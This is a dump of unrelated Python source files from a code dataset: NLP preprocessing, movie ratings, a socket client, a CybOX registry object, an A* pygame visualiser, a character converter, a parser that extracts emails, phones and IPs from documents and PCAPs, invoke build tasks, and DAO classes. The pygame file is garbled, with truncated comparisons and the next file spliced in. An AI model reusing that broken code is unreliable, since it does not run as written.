ある単語tの前後d単語を文脈語cとして抽出する(ただし,文脈語に単語tそのものは含まない)\n# 単語tを選ぶ度に,文脈幅dは{1,2,3,4,5}の範囲でランダムに決める.\n\nimport random\nfrom tqdm import tqdm\n\n\nwith open('./knock81.txt', 'r') as fin, \\\n open('./knock82.txt', 'w+') as fo:\n\n for line in tqdm(fin):\n words = line.split()\n for i, t in enumerate(words):\n d = random.randrange(1, 6) # {1,2,3,4,5}\n pre = words[max(i-d, 0):i]\n post = words[i+1: i+1+d]\n\n for c in pre+post:\n print(f'{t}\\t{c}', file=fo)\n","sub_path":"naomi/chapter09/knock82.py","file_name":"knock82.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"91035370","text":"import pandas as pd\n\nmetadata = pd.read_csv('/Users/sidverma/Documents/Projects/MovieRecommenderSystems/data/movies_metadata.csv',\n low_memory= False)\nC = metadata['vote_average'].mean() #C is the mean weight across the whole report\nm = metadata['vote_count'].quantile(0.90) #m is the minimum number of votes that top 10% of the rated movies got\n#we need the C and m to scale the metric('Rating') of the movies\n\nq_movies = metadata.copy().loc[metadata['vote_count'] >= m]\n#q_movies is a new dataframe that contains all the movies which have the number of votes >= m\n#we use .copy() method such that q_movies dataset is independent of metadata dataset\n#i.e any changes made to either of the dataset will not be reflected in other\nq_movies.shape\n\n#making the function which gives the weighted rating of the movies\ndef weighted_rating (x, m = m, C = C):\n v = x['vote_count']\n R = x['vote_average']\n\n return (v/(v+m) * R) + (m/(m+v) * C)\n\n#making another feature in the q_movies to include the weighted average\n\nq_movies['score'] = q_movies.apply(weighted_rating, axis = 1)\nq_movies.sort_values('score',ascending= False)\n","sub_path":"IMDb-Top15.py","file_name":"IMDb-Top15.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"492903423","text":"import socket\nimport sys\nimport numpy as np\nfrom dating.utils import floats_to_msg4\n\n\nPORT = int(sys.argv[1])\n\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.connect(('localhost', PORT))\n\nnum_string = sock.recv(4)\nassert num_string.endswith('\\n')\n\nnum_attr = int(num_string[:-1])\n\nprint('20 Initial candidate scores and attributes:')\nfor i in range(20):\n # score digits + binary labels + commas + exclamation\n data = sock.recv(8 + 2*num_attr)\n print('Score = %s' % data[:8])\n assert data[-1] == '\\n'\n\nfor i in range(20):\n #Guess Weights\n guess_weights = np.random.random(num_attr) \n sock.sendall(floats_to_msg4(guess_weights))\n\n print(\"Sending guess: \"+ floats_to_msg4(guess_weights))\n data = sock.recv(8)\n assert data[-1] == '\\n'\n score = float(data[:-1])\n print('Received a score = %f for i = %d ' % (score, i))\n\nsock.close()\n","sub_path":"python2/test_matchmaker.py","file_name":"test_matchmaker.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"617378708","text":"import cybox.utils as utils\nimport cybox.bindings.cybox_common_types_1_0 as common_types_binding\nimport cybox.bindings.win_registry_key_object_1_3 as win_registry_key_binding\nfrom cybox.common.baseobjectattribute import Base_Object_Attribute\nfrom cybox.common.byterun import ByteRuns\nfrom cybox.objects.win_handle_object import Win_Handle_List\n\nclass Registry_Key:\n def __init__(self):\n pass\n \n @classmethod\n def object_from_dict(cls, registry_key_dict):\n \"\"\"Create the Win Registry Key Object object representation from an input dictionary\"\"\"\n registry_key_obj = win_registry_key_binding.WindowsRegistryKeyObjectType()\n registry_key_obj.set_anyAttributes_({'xsi:type' : 'WinRegistryKeyObj:WindowsRegistryKeyObjectType'})\n registry_value = win_registry_key_binding.RegistryValueType()\n\n for key, value in registry_key_dict.items():\n if key == 'hive' and utils.test_value(value):\n registry_key_obj.set_Hive(Base_Object_Attribute.object_from_dict(common_types_binding.StringObjectAttributeType(datatype='String'), value))\n elif key == 'key' and utils.test_value(value):\n registry_key_obj.set_Key(Base_Object_Attribute.object_from_dict(common_types_binding.StringObjectAttributeType(datatype='String'), value))\n elif key == 'number_values' and utils.test_value(value):\n registry_key_obj.set_Number_Values(Base_Object_Attribute.object_from_dict(common_types_binding.UnsignedIntegerObjectAttributeType(datatype='UnsignedInteger'), value))\n elif key == 'values' :\n registry_values_obj = win_registry_key_binding.RegistryValuesType()\n for registry_value_dict in value:\n registry_value_obj = cls.__registry_value_object_from_dict(registry_value_dict)\n if registry_value_obj.hasContent_() : registry_values_obj.add_Value(registry_value_obj)\n if registry_values_obj.hasContent_() : registry_key_obj.set_Values(registry_values_obj)\n elif key == 'modified_time' and utils.test_value(value):\n registry_key_obj.set_Modified_Time(Base_Object_Attribute.object_from_dict(common_types_binding.DateTimeObjectAttributeType(datatype='DateTime'), value))\n elif key == 'creator_username' and utils.test_value(value):\n registry_key_obj.set_Creator_Username(Base_Object_Attribute.object_from_dict(common_types_binding.StringObjectAttributeType(datatype='String'), value)) \n elif key == 'handle_list':\n registry_key_obj.set_Handle_List(Win_Handle_List.object_from_dict(value))\n elif key == 'number_subkeys' and utils.test_value(value):\n registry_key_obj.set_Number_Subkeys(Base_Object_Attribute.object_from_dict(common_types_binding.UnsignedIntegerObjectAttributeType(datatype='UnsignedInteger'), value)) \n elif key == 'subkeys' :\n subkeys_obj = win_registry_key_binding.RegistrySubkeysType()\n for sub_registry_key_dict in value:\n sub_registry_key_obj = cls.object_from_dict(sub_registry_key_dict)\n if sub_registry_key_obj.hasContent_() : subkeys_obj.add_Subkey(sub_registry_key_obj)\n if subkeys_obj.hasContent_() : registry_key_obj.set_Subkeys(subkeys_obj)\n elif key == 'byte_runs' : \n registry_key_obj.set_Byte_Runs(ByteRuns.object_from_dict(value))\n return registry_key_obj\n\n @classmethod\n def dict_from_object(cls, registry_key_obj):\n \"\"\"Parse and return a dictionary for a Win Registry Key Object object\"\"\" \n registry_key_dict = {}\n if registry_key_obj.get_Key() is not None: registry_key_dict['key'] = Base_Object_Attribute.dict_from_object(registry_key_obj.get_Key())\n if registry_key_obj.get_Hive() is not None: registry_key_dict['hive'] = Base_Object_Attribute.dict_from_object(registry_key_obj.get_Hive())\n if registry_key_obj.get_Number_Values() is not None: registry_key_dict['number_values'] = Base_Object_Attribute.dict_from_object(registry_key_obj.get_Number_Values())\n if registry_key_obj.get_Values() is not None: registry_key_dict['values'] = cls.__registry_value_dict_from_object(registry_key_obj.get_Values())\n if registry_key_obj.get_Modified_Time() is not None: registry_key_dict['modified_time'] = Base_Object_Attribute.dict_from_object(registry_key_obj.get_Modified_Time())\n if registry_key_obj.get_Creator_Username() is not None: registry_key_dict['creator_username'] = Base_Object_Attribute.dict_from_object(registry_key_obj.get_Creator_Username())\n if registry_key_obj.get_Handle_List() is not None: registry_key_dict['handle_list'] = Win_Handle_List.dict_from_object(registry_key_obj.get_Handle_List())\n if registry_key_obj.get_Number_Subkeys() is not None: registry_key_dict['number_subkeys'] = Base_Object_Attribute.dict_from_object(registry_key_obj.get_Number_Subkeys())\n if registry_key_obj.get_Subkeys() is not None:\n subkeys_list = []\n for subkey_obj in registry_key_obj.get_Subkeys().get_Subkey():\n subkey_dict = cls.dict_from_object(subkey_obj)\n subkeys_list.append(subkey_dict)\n registry_key_dict['subkeys'] = subkeys_list\n if registry_key_obj.get_Byte_Runs() is not None: registry_key_dict['byte_runs'] = ByteRuns.dict_from_object(registry_key_obj.get_Byte_Runs())\n return registry_key_dict\n\n @classmethod\n def __registry_value_object_from_dict(cls, registry_value_dict):\n registry_value_obj = win_registry_key_binding.RegistryValueType()\n for key, value in registry_value_dict.items():\n if key == 'name' and utils.test_value(value):\n registry_value_obj.set_Name(Base_Object_Attribute.object_from_dict(common_types_binding.StringObjectAttributeType(datatype='String'),value))\n elif key == 'data' and utils.test_value(value):\n registry_value_obj.set_Data(Base_Object_Attribute.object_from_dict(common_types_binding.StringObjectAttributeType(datatype='String'),value))\n elif key == 'datatype' and utils.test_value(value):\n registry_value_obj.set_Datatype(Base_Object_Attribute.object_from_dict(common_types_binding.StringObjectAttributeType(datatype='String'),value))\n elif key == 'byte_runs' : ByteRuns.object_from_dict(value)\n return registry_value_obj\n\n @classmethod\n def __registry_value_dict_from_object(cls, registry_value_obj):\n registry_value_dict = {}\n if registry_value_obj.get_Name() is not None: registry_value_dict['name'] = Base_Object_Attribute.dict_from_object(registry_value_obj.get_Name())\n if registry_value_obj.get_Data() is not None: registry_value_dict['data'] = Base_Object_Attribute.dict_from_object(registry_value_obj.get_Data())\n if registry_value_obj.get_Datatype() is not None: registry_value_dict['datatype'] = Base_Object_Attribute.dict_from_object(registry_value_obj.get_Datatype())\n if registry_value_obj.get_Byte_Runs() is not None: registry_value_dict['byte_runs'] = ByteRuns.dict_from_object(registry_value_obj.get_Byte_Runs())\n return registry_value_dict","sub_path":"cybox/objects/registry_object.py","file_name":"registry_object.py","file_ext":"py","file_size_in_byte":7318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"157433357","text":"import pygame\nimport time\nfrom button import button\nfrom aStar import main\nBLUE=[106,159,181]\nRED=[255,0,0]\nc=(230, 230, 255)\nROW=25\nCOL=60\n\ndef displayMessage(msg,window):\n\tSetdst=button(BLUE,0,501,1200,100,msg)\n\tSetdst.draw(window)\n\tpygame.display.update()\ndef changeColor(newsrc,src,color):\n\tif not src:\n\t\tsrc=newsrc\n\t\tpygame.draw.rect(window,color,(src[0]*20+2,src[1]*20+2,18,18))\n\t\tpygame.display.update()\n\t\treturn\n\tpygame.draw.rect(window,(255,255,255),(src[0]*20+2,src[1]*20+2,18,18))\n\tsrc=newsrc\n\tpygame.draw.rect(window,color,(src[0]*20+2,src[1]*20+2,18,18))\n\tpygame.display.update()\ndef createHurdles(h,grid,ar):\n\tif ar==1:\n\t\tpygame.draw.rect(window,(0,0,0),(h[0]*20+2,h[1]*20+2,18,18))\n\t\tgrid[h[1]][h[0]]=0\n\t\tpygame.display.update()\n\telse:\n\t\tpygame.draw.rect(window,(255,255,255),(h[0]*20+2,h[1]*20+2,18,18))\n\t\tgrid[h[1]][h[0]]=1\n\t\tpygame.display.update()\npygame.init()\nwindow = pygame.display.set_mode((1200,600))\npygame.display.set_caption(\"A* Visualization\")\n\nwindow.fill((255,255,255))\npygame.display.update()\npygame.display.flip()\ndef index():\n\twindow.fill((255,255,255))\n\tdisplayMessage(\"select a cell for start.... press F after selection\",window)\n\tfor x in range(0,501,20):\n\t\tpygame.draw.line(window,c,(0,x),(1200,x),2)\n\t\tpygame.display.update()\n\tfor y in range(0,1201,20):\n\t\tpygame.draw.line(window,c,(y,0),(y,500),2)\n\t\tpygame.display.update()\n\tdst=None\n\tsrc=None\n\trun=True\n\twhile run:\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type==pygame.MOUSEBUTTONDOWN and event.button == 1:\n\t\t\t\tfollow=True\n\t\t\t\twhile follow:\n\t\t\t\t\tpos=pygame.mouse.get_pos()\n\t\t\t\t\tif pos[0]>=0 and pos[0]=0 and pos[1]=0 and pos[0]=0 and pos[1]=0 and pos[0]=0 and pos[1]\n\nEveryone is permitted to copy and distribute verbatim or modified\ncopies of this license document, and changing it is allowed as long\nas the name is changed.\n\n DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE\n TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION\n\n 0. You just DO WHAT THE FUCK YOU WANT TO.\n\n'''\n\nimport argparse\n\n#iso8859_replacement = u\"ÀÁÂÃÄŰÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖרÙÚÛÜÝÞß\"\n#russian_alphabet = u\"АБВГДЕЁЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯ\"\n#reps = {'А':'À', 'Б':'Á', 'В':'Â', 'Г':'Ã', 'Д':'Ä', 'Е':'Å', 'Ё':'°', 'Ж':'Æ', 'З':'Ç', 'И':'È', 'Й':'É', 'К':'Ê', 'Л':'Ë', 'М':'Ì', 'Н':'Í', 'О':'Î', 'П':'Ï', 'Р':'Ð', 'С':'Ñ', 'Т':'Ò', 'У':'Ó', 'Ф':'Ô', 'Х':'Õ', 'Ц':'Ö', 'Ч':'×', 'Ш':'Ø', 'Щ':'Ù', 'Ъ':'Ú', 'Ы':'Û', 'Ь':'Ü', 'Э':'Ý', 'Ю':'Þ', 'Я':'ß'}\n\ndictionary = {u'А':u'À', u'Б':u'Á', u'В':u'Â', u'Г':u'Ã', u'Д':u'Ä', u'Е':u'Å',\n u'Ё':u'°', u'Ж':u'Æ', u'З':u'Ç', u'И':u'È', u'Й':u'É', u'К':u'Ê',\n u'Л':u'Ë', u'М':u'Ì', u'Н':u'Í', u'О':u'Î', u'П':u'Ï', u'Р':u'Ð',\n u'С':u'Ñ', u'Т':u'Ò', u'У':u'Ó', u'Ф':u'Ô', u'Х':u'Õ', u'Ц':u'Ö',\n u'Ч':u'×', u'Ш':u'Ø', u'Щ':u'Ù', u'Ъ':u'Ú', u'Ы':u'Û', u'Ь':u'Ü',\n u'Э':u'Ý', u'Ю':u'Þ', u'Я':u'ß',\n u'а':u'à', u'б':u'á', u'в':u'â', u'г':u'ã', u'д':u'ä', u'е':u'å',\n u'ё':u'±', u'ж':u'æ', u'з':u'ç', u'и':u'è', u'й':u'é', u'к':u'ê',\n u'л':u'ë', u'м':u'ì', u'н':u'í', u'о':u'î', u'п':u'ï', u'р':u'ð',\n u'с':u'ñ', u'т':u'ò', u'у':u'ó', u'ф':u'ô', u'х':u'õ', u'ц':u'ö',\n u'ч':u'÷', u'ш':u'ø', u'щ':u'ù', u'ъ':u'ú', u'ы':u'û', u'ь':u'ü',\n u'э':u'ý', u'ю':u'þ', u'я':u'ÿ'}\n\ndef replace_all(text, dic):\n for i, j in dic.iteritems():\n text = text.replace(i, j)\n return text\n\n# Pre-part l_ mean that variable is mine\n\nl_Parser = argparse.ArgumentParser()\nl_Parser.add_argument(\"input_file\")\nl_Args = l_Parser.parse_args()\n\nl_File_In = open(l_Args.input_file)\nl_File_Out = open(\"base-language.txt.custom\", \"w\")\n\nl_File_Out.write(\"\\xef\\xbb\\xbf\\r\\n\")\n\nfor entry in l_File_In:\n #for i, j in dictionary.iteritems():\n # entry = entry.decode(\"utf-8\").replace(i, j)\n l_File_Out.write(replace_all(entry.decode(\"utf-8\"), dictionary).encode(\"utf-8\"))\n\nl_File_In.close()\nl_File_Out.close()\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"native2custom.py","file_name":"native2custom.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"150349716","text":"from ControlLayer.PDFReader import *\nfrom ControlLayer.RegexChecker import *\nfrom ControlLayer.PCAPReader import *\nfrom ControlLayer.TxtReader import *\nfrom ControlLayer.CsvReader import *\nfrom ControlLayer.ImgReader import *\nfrom ModelLayer.Identifier import *\n\nclass FileParser: #Might want to refactor this class, as there is a lot of repeated code.\n\n def ParsePDF(self, paths):\n id = 0 #Id gets incremented when searching for identifiers and attached to them\n identifiers = []\n pdfReader = PdfReader()\n regex = RegexChecker()\n for path in paths:\n textDict = pdfReader.readImages(path) #Gets all normal text and text on images from PDF\n for page in textDict:\n \n emails = regex.checkMail(textDict[page]) #Find all emails using RegEx\n for email in emails:\n ident = Identifier(email, \"Email\", path, page, id)\n identifiers.append(ident) #Add email identifiers to list\n id +=1\n \n phoneNumbers = regex.checkPhone(textDict[page]) #Find all danish phone numbers using RegEx\n for number in phoneNumbers:\n ident = Identifier(number, \"PhoneNumber\", path, page, id)\n identifiers.append(ident) #Add phone number identifiers to list\n id +=1\n\n ips = regex.findIP(textDict[page]) #Find all IPv4 and IPv6 addresses using RegEx\n for ip in ips:\n ident = Identifier(number, \"IP\", path, page, id)\n identifiers.append(ident) #Add IP address identifiers to list\n id +=1\n\n return identifiers\n \n def ParseImg(self, paths):\n id = 0\n identifiers = []\n imRead = ImgReader()\n regex = RegexChecker()\n for path in paths:\n img = imRead.ReadFile(path)\n emails = regex.checkMail(img)\n for email in emails:\n ident = Identifier(email, \"Email\", path, 0, id)\n identifiers.append(ident)\n id+=1\n\n phoneNumbers = regex.checkPhone(img)\n for number in phoneNumbers:\n ident = Identifier(number, \"Telefon Nr.\", path, 0, id)\n identifiers.append(ident)\n id+=1\n\n ips = regex.findIP(img)\n for ip in ips:\n ident = Identifier(ip, \"IP-adresse\", path, 0, id)\n identifiers.append(ident)\n id+=1\n return identifiers\n\n def ParseCsv(self, paths):\n id = 0\n identifiers = []\n csvReader = CsvReader()\n regex = RegexChecker()\n for path in paths:\n csvRows = csvReader.ReadFile(path)\n for row in csvRows:\n #Search for email\n emails = regex.checkMail(str(row))\n for email in emails:\n ident = Identifier(email, \"Email\", path, 0, id)\n identifiers.append(ident)\n id+=1\n #Search for phone numbers\n phoneNumbers = regex.checkPhone(str(row))\n for number in phoneNumbers:\n ident = Identifier(number, \"Telefon Nr.\", path, 0, id)\n identifiers.append(ident)\n id+=1\n #Search for IP addresses\n ips = regex.findIP(str(row))\n for ip in ips:\n ident = Identifier(ip, \"IP-adresse\", path, 0, id)\n identifiers.append(ident)\n ip+=1\n return identifiers\n\n \n def ParseTxt(self, paths):\n id = 0\n identifiers = []\n txtReader = TxtReader()\n regex = RegexChecker()\n for path in paths:\n data = txtReader.ReadFile(path)\n emails = regex.checkMail(data)\n for email in emails:\n ident = Identifier(email, \"Email\", path, 0, id)\n identifiers.append(ident)\n id+=1\n\n phoneNumbers = regex.checkPhone(data)\n for number in phoneNumbers:\n ident = Identifier(number, \"Telefon Nr.\", path, 0, id)\n identifiers.append(ident)\n id+=1\n\n ips = regex.findIP(data)\n for ip in ips:\n ident = Identifier(ip, \"IP-adresse\", path, 0, id)\n identifiers.append(ident)\n id+=1\n\n return identifiers\n \n def ParsePcap(self, paths):\n id = 0\n identifiers = []\n pcapReader = PCAPReader()\n for path in paths:\n ips = pcapReader.ReadFile(path)\n for ip in ips:\n ident = Identifier(ip, \"IP\", path, 0, id)\n identifiers.append(ident)\n id+=1\n \n return identifiers\n\n \n","sub_path":"WoddenLegs/ControlLayer/FileParser.py","file_name":"FileParser.py","file_ext":"py","file_size_in_byte":4907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"335788866","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport subprocess\nfrom datetime import datetime\n\nimport six\nfrom invoke import task\n\nroot = os.path.dirname(os.path.abspath(__file__))\npackage_name = \"plum_tools\"\n\n\ndef covert_source(source):\n source = source.replace(\"/\", \".\")\n if source.endswith(\".py\"):\n source = source[:-3]\n return source\n\n\n@task\ndef clean(ctx):\n \"\"\"清除项目中无效文件\"\"\"\n ctx.run(\"rm -rf build dist\", echo=True)\n ctx.run(\"find . -name '*.pyc' -exec rm -f {} +\", echo=True)\n ctx.run(\"find . -name '*.pyo' -exec rm -f {} +\", echo=True)\n ctx.run(\"find . -name '*.log' -exec rm -f {} +\", echo=True)\n ctx.run(\"find . -name '__pycache__' -exec rm -rf {} +\", echo=True)\n ctx.run(\"find . -name 'htmlcov' -exec rm -rf {} +\", echo=True)\n ctx.run(\"find . -name '.coverage*' -exec rm -rf {} +\", echo=True)\n ctx.run(\"find . -name '.pytest_cache' -exec rm -rf {} +\", echo=True)\n ctx.run(\"find . -name '.benchmarks' -exec rm -rf {} +\", echo=True)\n ctx.run(\"find . -name '*.egg-info' -exec rm -rf {} +\", echo=True)\n ctx.run(\"find . -name '.DS_Store' -exec rm -rf {} +\", echo=True)\n\n\n@task\ndef checkone(ctx, source):\n \"\"\"检查代码规范\n\n inv checkone tasks.py\n \"\"\"\n ctx.run(\n \"isort --check-only --diff {source}\".format(source=source),\n echo=True,\n )\n ctx.run(\"black --check {source}\".format(source=source), echo=True)\n ctx.run(\"flake8 {source}\".format(source=source), echo=True)\n if six.PY3:\n ctx.run(\"mypy {source}\".format(source=source), echo=True)\n\n\n@task(clean)\ndef sdist(ctx):\n ctx.run(\"python setup.py sdist\", echo=True)\n\n\n@task(clean)\ndef upload(ctx, name=\"private\"):\n \"\"\"上传包到指定pip源\"\"\"\n ctx.run(\"python setup.py sdist upload -r %s\" % name, echo=True)\n\n\n@task(sdist)\ndef tupload(ctx, name=\"private\"):\n \"\"\"上传包到指定pip源\"\"\"\n ctx.run(\"twine upload dist/* -r %s\" % name, echo=True)\n\n\n@task(clean)\ndef check(ctx, job=4):\n \"\"\"检查代码规范\"\"\"\n ctx.run(\"isort --check-only --diff %s\" % package_name, echo=True)\n if six.PY3:\n ctx.run(\"black --check %s\" % package_name, echo=True)\n ctx.run(\"flake8 %s\" % package_name, echo=True)\n if six.PY3:\n ctx.run(\"mypy %s\" % package_name, echo=True)\n\n\n@task(clean)\ndef unittest(ctx):\n \"\"\"运行单元测试和计算测试覆盖率\n\n pytest --cov-config=.coveragerc --cov=plum_tools --cov-fail-under=100 tests\n \"\"\"\n ctx.run(\n \"export PYTHONPATH=`pwd` && pytest tests\", encoding=\"utf-8\", pty=True, echo=True\n )\n\n\n@task(clean)\ndef coverage(ctx):\n \"\"\"运行单元测试和计算测试覆盖率\"\"\"\n ctx.run(\n \"export PYTHONPATH=`pwd` && \"\n \"coverage run --rcfile=.coveragerc --source=%s -m pytest tests && \"\n \"coverage report -m --fail-under=57\" % package_name,\n encoding=\"utf-8\",\n pty=True,\n echo=True,\n )\n\n\n@task(clean)\ndef unittestone(ctx, source, test):\n \"\"\"运行单元测试和计算测试覆盖率\n\n inv unittestone --source plum_tools.fib --test tests/test_fib.py\n \"\"\"\n ctx.run(\n \"export PYTHONPATH=`pwd` && \"\n \"pytest -vv -rsxS -q --cov-config=.coveragerc --cov-report term-missing \"\n \"--cov --cov-fail-under=100 {source} {test}\".format(\n source=covert_source(source), test=test\n ),\n encoding=\"utf-8\",\n pty=True,\n echo=True,\n )\n\n\n@task(clean)\ndef coverageone(ctx, source, test):\n \"\"\"运行单元测试和计算测试覆盖率\n\n inv coverageone --source plum_tools.fib --test tests/test_fib.py\n \"\"\"\n ctx.run(\n \"export PYTHONPATH=`pwd` && \"\n \"coverage run --rcfile=.coveragerc --source={source} -m pytest -vv -rsxS -q {test} && \"\n \"coverage report -m\".format(source=covert_source(source), test=test),\n encoding=\"utf-8\",\n pty=True,\n echo=True,\n )\n\n\n@task(clean)\ndef format(ctx):\n \"\"\"格式化代码\"\"\"\n autoflake_args = [\n \"--remove-all-unused-imports\",\n \"--recursive\",\n \"--remove-unused-variables\",\n \"--in-place\",\n \"--exclude=__init__.py\",\n ]\n ctx.run(\n \"autoflake {args} {package_name} tests\".format(args=\" \".join(autoflake_args)),\n package_name=package_name,\n echo=True,\n )\n ctx.run(\"isort %s tests\" % package_name, echo=True)\n if six.PY3:\n ctx.run(\"black %s tests\" % package_name, echo=True)\n\n\n@task(clean)\ndef formatone(ctx, source):\n \"\"\"格式化单个文件\"\"\"\n autoflake_args = [\n \"--ignore-init-module-imports\",\n \"--remove-all-unused-imports\",\n \"--recursive\",\n \"--remove-unused-variables\",\n \"--in-place\",\n \"--exclude=__init__.py\",\n ]\n ctx.run(\n \"autoflake {args} {source}\".format(\n source=source, args=\" \".join(autoflake_args)\n ),\n echo=True,\n )\n ctx.run(\"isort {source}\".format(source=source), echo=True)\n if six.PY3:\n ctx.run(\"black {source}\".format(source=source), echo=True)\n\n\ndef get_site_packages_dir(packages: str) -> str:\n if packages is None:\n return \"\"\n if not os.getenv(\"VIRTUAL_ENV\"):\n return \"\"\n site_packages_dir = subprocess.check_output(\n \"find ${VIRTUAL_ENV} -name 'site-packages'\", shell=True, text=True\n ).strip()\n if not packages.strip():\n return site_packages_dir\n packages_list = [\n package_name.strip()\n for package_name in packages.split(\",\")\n if package_name.strip()\n ]\n packages_unique = sorted(\n list(set(packages_list)), key=lambda x: packages_list.index(x)\n )\n if packages_unique:\n return \" \".join(\n [\n os.path.join(site_packages_dir, package_name)\n for package_name in packages_unique\n ]\n )\n return site_packages_dir\n\n\ndef get_plint_args(msg_ids: str, ignore_default: bool) -> list:\n pylint_args = [\n \"--jobs=0\",\n \"--exit-zero\",\n \"--persistent=n\",\n ]\n if not ignore_default:\n pylint_args.append(\n \"--ignore=.git,venv*,docs,node_modules,tests,test*.py,debug_celery.py\"\n )\n if msg_ids:\n pylint_args.extend([\"--disable=all\", f\"--enable={msg_ids}\"])\n return pylint_args\n\n\n@task\ndef pylintone(ctx, source, msg_ids=\"\", packages=None, ignore_default=False):\n \"\"\"检查单个文件\n\n inv --help pylintone\n\n inv pylintone --source 'plum_tools *.py' --msg-ids=\"W1505\" --packages=\"pymongo,celery\"\n \"\"\"\n time_str = datetime.now().strftime(\"%Y%m%d_%H%M%S\")\n file_name = f'pylint_{msg_ids.replace(\",\", \"_\")}_{time_str}.log'\n site_packages_dir = get_site_packages_dir(packages)\n pylint_args = \" \".join(get_plint_args(msg_ids, ignore_default))\n cmd = f\"pylint {pylint_args} {source} {site_packages_dir} > {file_name}\"\n ctx.run(cmd, echo=True)\n\n\n@task\ndef lock(ctx):\n \"\"\"生成版本文件\n\n 1.安装Pipenv\n\n pip install pipenv\n\n 2.安装项目依赖包\n\n pipenv install --deploy --dev --skip-lock\n \"\"\"\n ctx.run(\n 'if [ -f \"Pipfile.lock\" ]; then pipenv lock -v --keep-outdated ; else pipenv lock --pre --clear ; fi',\n echo=False,\n )\n","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":7147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"497239156","text":"#CalDaQinDiGuo5v2.py\nimport jieba\ntxt = open(\"大秦帝国5.txt\", \"r\", encoding=\"utf-8\").read()\nexcludes = {\"没有\",\"秦国\",\"一个\",\"天下\",\"已经\",\"将军\",\"秦军\",\"如此\",\"立即\",\"之后\",\\\n \"秦王\",\"自己\",\"便是\",\"太子\",\"大军\",\"不能\"}\nwords = jieba.lcut(txt)\ncounts = {}\nfor word in words:\n if len(word) == 1:\n continue\n elif word == \"嬴政\" or word == \"皇帝\":\n rword = \"嬴政\"\n else:\n rword = word\n counts[rword] = counts.get(rword,0) + 1\nfor word in excludes:\n del counts[word]\nitems = list(counts.items())\nitems.sort(key=lambda x:x[1], reverse=True)\nprint(\"大秦帝国第五部,人物出场次数统计:\")\nfor i in range(5):\n word, count = items[i]\n print(\"{0:<10}{1:>5}\".format(word, count))\n","sub_path":"代码/Python/CalDaQinDiGuo5v2.py","file_name":"CalDaQinDiGuo5v2.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"170146239","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom classes.businessClasses import *\n\n\nclass DaoAbstract(object):\n type = 'Generic / Abstract'\n\n def __init__(self):\n if self.__class__.__name__ == 'DaoAbstract':\n raise ValueError('Dao can not be instantiated.')\n\n def __str__(self):\n return self.type + ' Dao'\n\n @staticmethod\n def _str_to_bool_(str):\n return str == 'True'\n\n @staticmethod\n def _str_to_date_(str):\n return datetime.date(int(str.split('-')[0]), int(str.split('-')[1]), int(str.split('-')[2]))\n\n @staticmethod\n def _create_payment_type_from_string_(payment_type_string):\n if str(payment_type_string) == '70-30':\n return PaymentTypeXXYY(70, 30)\n if str(payment_type_string) == '80-20':\n return PaymentTypeXXYY(80, 20)\n if str(payment_type_string) == '90-10':\n return PaymentTypeXXYY(90, 10)\n if str(payment_type_string) == '50-50':\n return PaymentType5050()\n if str(payment_type_string) in ['Canje semanal', 'canje semanal']:\n return PaymentTypeWeeklyExchanges()\n if str(payment_type_string) in ['Canje vencimiento', 'canje al cierre']:\n return PaymentTypeExchangedAtExpiration()\n if str(payment_type_string) in ['100%', '1']:\n return PaymentType100()\n if str(payment_type_string) in ['ventas 100 al cierre', 'Ventas 100% al cierre']:\n return PaymentType100(payment_at_expiration=True)\n if str(payment_type_string) in ['Precompra', 'precompra', 'Pre Compra', 'pre compra']:\n return PaymentTypePrePurchase()\n if str(payment_type_string) in ['Manual', 'manual']:\n return PaymentTypeManual()\n raise ValueError('{0} is not a valid PaymentType subclass'.format(str(payment_type_string)))\n\n def _create_payment_from_dictionary_(self, offer, sub_offer, payment_dic):\n return Payment(offer, sub_offer, payment_dic['id'], payment_dic['original_amount'], payment_dic['amount'],\n datetime.date(int(payment_dic['date'].split('-')[0]), int(payment_dic['date'].split('-')[1]),\n int(payment_dic['date'].split('-')[2])),\n PaymentMethod(payment_dic['payment_method'].split('-')[0].strip(),\n payment_dic['payment_method'].split('-')[1].strip()),\n self._create_payment_type_from_string_(payment_dic['payment_type']), payment_dic['description'],\n payment_dic['status'])\n\n def _create_sub_offer_from_dictionary_(self, offer, sub_offer_dic):\n sub_offer = SubOffer(offer, sub_offer_dic['id'], sub_offer_dic['price'], sub_offer_dic['sold'],\n sub_offer_dic['exchanged'], sub_offer_dic['cancelled'], sub_offer_dic['commission'], [])\n\n sub_offer.payments = map(lambda x: self._create_payment_from_dictionary_(offer, sub_offer, x),\n sub_offer_dic['payments'])\n\n return sub_offer\n\n def create_offer_from_dictionary(self, offer_dic):\n supplier = self.create_supplier_from_dictionary(offer_dic['supplier'])\n\n offer = Offer(offer_dic['id'], [], offer_dic['product'], supplier,\n datetime.date(int(offer_dic['date'].split('-')[0]), int(offer_dic['date'].split('-')[1]),\n int(offer_dic['date'].split('-')[2])),\n datetime.date(int(offer_dic['online_end_date'].split('-')[0]),\n int(offer_dic['online_end_date'].split('-')[1]),\n 